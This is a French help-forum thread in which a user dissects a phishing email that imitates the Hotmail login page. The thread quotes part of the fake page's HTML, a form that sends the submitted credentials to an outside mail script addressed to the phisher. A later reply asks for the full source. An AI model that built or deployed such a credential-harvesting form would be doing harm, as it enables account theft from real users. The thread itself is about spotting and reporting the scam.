KioskeaKioskeaCommentCaMarcheInscrivez-vous, c'est gratuit !
Mardi 13 mai 2008 - 05:16:23

Phishing Hotmail

Rechercher : dans
Phishing Hotmail
par kaytoo
 Fil de Discussions
Statut : Non résolu
mercredi 22 août 2007 à 08:59:03
Bonjour, Alors voila le soucis:
J'ai reçu un email, il y a deux jours peut être, maladresse du serveur, envoyé par erreur (a lire sur le rythme de "la lettre" de Renan Luce xD). Bon cesse de plaisanteries.

Dans ce mail le lien vers une page html, copy conforme du site login hotmail. Indétectable pour un utilisateur lambda.

En revanche en affichant le code source voila sur quoi je suis tombé:

<form name="f1" style="margin:0px;" method="POST" target="_top" action="http://www.safelink.net/cgi-bin/MailForm.exe" method="POST">
<input type="hidden" name="Subject" value="Fake xbox Login">
<input type="hidden" name="File" value="https://login.live.com/ppsecure/post.srf?id=2&bk=1184533180">
<input type="hidden" name="SMTP" value="mail.safelink.net">
<input type="hidden" name="From" value="midomido75000@gmail.com">
<input type="hidden" name="To" value="midomido75000@gmail.com">
[...] avec encore plein de champs <input type="hidden" ...>

Ceci correspond au formulaire que vous saisissez et que vous envoyez non pas à hotmail .... mais à un soit disant midomido75000@gmail.com
Encore moins malin ce dernier soit disant "Hacker" (http://www.zataz.com/images/deface-screenshots/1186764601.pdf trouvé sur google) a même le culot d'appelé le sujet "Fake xbox Login" ...

Plusieurs questions:
- Peut on sous gmail, voir le profil de cet utilisateur ?
- Ou peut on dénoncer ce genre phishing afin qu'il prenne sa fessé ?
- Peux on repliquer ? :D

Si vous avez des questions sur le code source (la suite entre autre) n'hesitez pas à me demander.

Bonne journée Ciao !
Configuration: Windows XP
Firefox 2.0.0.6
Répondre à kaytoo  Signaler ce message aux modérateurs Aller au dernier message

1


  • Ce message vous semble utile, votez !
  • Signaler ce message aux modérateurs
Par Dada_0075, le mardi 5 février 2008 à 01:58:39 Fil de Discussions
Sup Ece-que tu pourrais m'envoyer le code source au complet



Chow
Répondre à Dada_0075

2


  • Ce message vous semble utile, votez !
  • Signaler ce message aux modérateurs
Par naabquoi, le mercredi 30 avril 2008 à 17:15:40 Fil de Discussions 
salut j'ai cliké comme un con sur (http://www.zataz.com/images/deface-screenshots/1186764601.pdf sa risque qqch ? jai fermé direct apres
Répondre à naabquoi
Discussions pertinentes trouvées dans le forum
24/03 17h06vol adresse hotmail.comMessagerie/Chat24/03 17h523
21/03 18h46envoi de fichier sur hotmail impossibleInternet22/03 14h195
Plus de discussions sur « Phishing Hotmail » Discussion en cours Discussion fermée Problème résolu
Répondre
Titre du message :
Votre pseudo:
Votre email :
Message: 
  •  
  •  
Options: Recevoir les réponses par mail.
 

Aide